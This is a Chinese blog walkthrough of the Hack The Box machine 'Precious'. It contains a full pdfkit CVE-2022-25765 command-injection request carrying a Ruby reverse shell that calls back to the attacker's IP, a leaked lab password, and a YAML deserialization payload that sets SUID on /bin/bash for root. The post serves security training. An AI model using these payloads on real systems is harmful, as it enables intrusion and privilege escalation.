htb_Precious (exiftool, YAML文件)

已于 2023-04-03 15:26:44 修改
阅读量222 收藏 1
点赞数 1
分类专栏: hack the box 文章标签: 网络 linux 安全
于 2023-03-28 21:53:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62621015/article/details/129825750
版权

htb_Precious:10.10.11.189

非常简单~
在这里插入图片描述

kali攻击机网络配置

在这里插入图片描述

能ping通靶机,可以开始啦

在这里插入图片描述

端口扫描

nmap -A 10.10.11.189

开放了80,22端口

在这里插入图片描述

访问80端口,浏览器显示域名解析错误

解决方法:

kali攻击机设置本地域名解析

vim /etc/hosts

在这里插入图片描述

这个网站可以将我们传上去的web目录转为pdf

在这里插入图片描述

先看看源码,没发现

在这里插入图片描述

目录扫描,一无所获

在这里插入图片描述

子域名爆破,依旧一无所获

在这里插入图片描述

那就只能从这个网站的功能入手了,尝试将本地web目录转为pdf查看

kali开启http服务

 python3 -m http.server 80

在这里插入图片描述

写入本地url

在这里插入图片描述

转换成功后会直接跳转到pdf,但是不知道为啥是空白一片的

右键保存pdf到本地

在这里插入图片描述

exiftool可以用于读取各种文件的元数据

这里我们使用exiftool来解析pdf

发现pdfkit v0.8.6

在这里插入图片描述

查找cve

在这里插入图片描述

漏洞利用脚本

CyberArchitect1/CVE-2022-25765-pdfkit-Exploit-Reverse-Shell: pdfkit <0.8.6 command injection shell. The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized. (Tested on ver 0.8.6) - CVE-2022-25765 (github.com)

在这里插入图片描述

修改脚本中加粗的部分

curl 'http://precious.htb' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://precious.htb' -H 'Connection: keep-alive' -H 'Referer: http://precious.htb' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'url=http%3A%2F%2F10.10.16.62%3A80%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%2210.10.16.62%22%2C6666%29%29%27%60'

kali开启监听

在这里插入图片描述

执行脚本

在这里插入图片描述

连上了!

在这里插入图片描述

目录探测

在根目录下发现.bundle目录

在这里插入图片描述

发现config配置文件,是henry的账号密码

在这里插入图片描述

henry Q3c1AqGHtoI0aXAYFH

切换用户

在这里插入图片描述

henry的用户目录下发现flag

在这里插入图片描述

查看root命令

sudo -l

在这里插入图片描述

cat update_dependencies.rb

  • 这段代码的作用是比较已安装的依赖库和一个名为 “dependencies.yml” 的文件中指定的依赖库。
    “dependencies.yml” 文件是一个 YAML格式的文件,其中包含依赖库的名称和版本号,用于确保开发环境中安装的依赖库版本与项目的依赖库版本相匹配。

  • 代码中,首先使用 Ruby 的 YAML 库读取 “dependencies.yml” 文件,并使用 RubyGems
    库获取本地已安装的所有依赖库及其版本信息。然后,代码使用嵌套循环来比较本地已安装的每个依赖库的名称和版本号,与 “dependencies.yml” 文件中指定的每个依赖库的名称和版本号进行匹配。如果本地已安装的依赖库版本与指定的版本不匹配,则输出警告消息,指出已安装的依赖库版本与 “dependencies.yml” 文件中指定的版本不同。如果版本匹配,则输出信息,指出已安装的依赖库版本与
    “dependencies.yml” 文件中指定的版本相同。

在这里插入图片描述

找到一个漏洞利用脚本

Ruby Privilege Escalation | Exploit Notes (hdks.org)

在这里插入图片描述

给/bin/bash添加suid权限

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "chmod +s /bin/bash"
         method_id: :resolve



cd /home/henry
ls

在这里插入图片描述

sudo /usr/bin/ruby /opt/update_dependencies.rb

在这里插入图片描述

bash -p

提权成功

在这里插入图片描述

o了 😃

川川小宝
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackthebox(HTB) precious 靶机!
qq_58869808的博客
12-08 1698
hackthebox preicous 靶机
HTB_tools-开源
05-02
Whit htb-tools可以简化上传和下载的带宽分配的配置和监视。
HTB-Precious
TA不懒,但还没有添加简介
03-27 64
HTB-Precious
【干货】提取图片元数据之exiftool
04-28 805
知识源:UC3Mx:INF.2x网络安全基础:实践方法课程第1周。讲座2.计算机取证常见的法医痕迹2.2.1。元数据 exiftool是一种查看,更新或删除元数据的工具。是Windows和Linux的开源工具。它允许在各种文件中读取,编写和编辑元数据信息。这个工具可以从这里下载。http://www.sno.phy.queensu.ca/~phil/exi...
kali中exiftool命令查看图片exif信息
weixin_55631415的博客
12-30 2770
注:还可以用来生成图片一只密码病毒。exiftool 图片名。
《Kali渗透基础》03. 被动信息收集
学习学习学习......
05-25 1288
域名信息收集(nslookup、dig)、DNS 区域传输、域名爆破(fierce、dnsenum、dnsrecon)、域名注册信息(whois)、搜索引擎(Shodan、Google)、相关工具(theHarvester、Maltego、Recon-NG)、其他途径(社工字典、Metadata、Exif)。
ROS_HTB_优先限速
09-07
ROS_HTB_优先限速,不错的脚本试试吧
htb_challenges:为我所有过于复杂的htb挑战完成内容转储
03-27
htb_challenges 为我所有过于复杂的htb挑战完成内容转储
Python库 | htb_cli-0.1.1-py3-none-any.whl
02-16
python库,解压后可用。 资源全名:htb_cli-0.1.1-py3-none-any.whl
PyPI 官网下载 | htb_cli-0.1.1-py3-none-any.whl
01-05
资源来自pypi官网。 资源全名:htb_cli-0.1.1-py3-none-any.whl
ctfshow misc入门wp
m0_58030673的博客
01-31 5818
ctfshow misc入门wp,是关于图片类型隐写的题目
exiftools ---- 是否存在捆绑隐写
最新发布
Themanager112的博客
01-07 456
是一款非常强大的工具,用于读取、写入和编辑图像、音频和视频文件中的元数据信息。在 Kali Linux 中,可以轻松安装并使用。是个非常强大且灵活的工具,适用于多种用途,从简单的信息查看到复杂的数据批量处理。在 Kali Linux 中,可以使用。命令来查看和修改文件的元数据。安装完成后,可以使用。
HTB——Previse靶机wp
0nc3的博客
03-27 4497
Previse 2021/10/30 by ruanruan 0x00 信息收集 1、IP 10.10.11.104 2、port 全端口扫描: 详细版本信息: 22 ssh:高版本,尝试用m4lwhere、newguy做user进行爆破,无果。 80:web,登录框 思路: 用户名枚举+爆破,F 万能密码,F SQL注入,F 目录扫描,T 框架漏洞,F 逻辑漏洞,F 3、目录文件 未登录: 文件 状态码 页面信息 file_logs.php 200 1、找到do
Kali exiftool图片信息工具
董哥的黑板报
09-30 6833
一、什么是EXIF 可交换图像文件格式常被简称为Exif(Exchangeable image file format),是专门为数码相机的照片设定的,可以记录数码照片的属性信息和拍摄数据。Exif 可以被附加在 JPEG、TIFF、RIFF 等文件之中,为其增加有关数码相机拍摄信息的内容和缩略图或图像处理软件的一些版本信息 二、exiftool简介 官网:https://sno.phy.qu...
kali渗透之综合实战拿下root全过程
m0_56988395的博客
02-25 8750
目录 靶机 攻击机 开局先扫端口 keystore:密钥的储存库 提权 1、根据版本找一下看有没有漏洞 2、sudo -l 3、history 4、利用weatweb来识别一下http用的什么程序 发现数据库用户名为root,密码为空密码,进到mysql看看 登录一下milton 切换blumbergh用户 最后开个新终端进行监听端口 注:以下内容仅供交流学习,请勿用于非法途径 这次渗透涉及的知识点较多,难度稍微复杂些许 靶机 DC-9(需要主机模式
HackTheBox-Machines-Precious
weixin_46420165的博客
12-14 913
是了 正是我们利用python开启的HTTP服务web页面 有一个工具exiftools 可以解析pdf文件。点击确定进行下载,下载之后看一下文件内容是不是我们python开启的HTTP服务web页面。他的意思是将网页转换为pdf文件格式 我们尝试测试一下利用python开启http服务。现在看到了他可以请求便可以进行反弹shell,接下来我们进行尝试反弹shell。然后利用搜索引擎搜索一下此pdfkit漏洞,下面给你们看一看我利用的文档。成功拿到反弹shell,然后进行寻找有用的东西。
HackTheBox Precious CVE-2022-25765利用,YAML反序列化攻击提权
Ba1_Ma0的博客
12-12 1825
HackTheBox靶机
小白日记5:kali渗透测试之被动信息收集(四)--theHarvester,metagoofil,meltag,个人专属密码字典--CUPP
ZiXuanFY的博客
09-07 5711
1、theHarvester theHarvester是一个社会工程学工具,它通过搜索引擎、PGP服务器以及SHODAN数据库收集用户的email,子域名,主机,雇员名,开放端口和banner信息。 注:一般需要翻墙                 #可使用proxychains指定代理 root@kali:~# theharvester -h *********
Linux-CentOS 安装配置ExifTool
郎涯技术
12-15 5016
Exif是英文Exchangeable Image File Format的缩写,最初由日本电子工业发展协会(JEIDA--JapanElectronicIndustryDevelopmentAssociation)制订,目前的最新版本是发表于2002年4月的2.2版。其实EXIF就是一种图像文件格式,EXIF信息就是由数码相机在拍摄过程中采集一系列的信息,然后把信息放置在我们熟知的JPG文件的头
tc命令创建htb树存放的文件位置
05-30
tc命令创建htb树存放的文件位置可以通过以下命令查看: ``` cat /proc/net/htb_default ``` 该命令会显示HTB队列树的详细信息,其中包括根队列的ID和...默认情况下,HTB队列树存储在`/proc/net/htb_default`文件中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值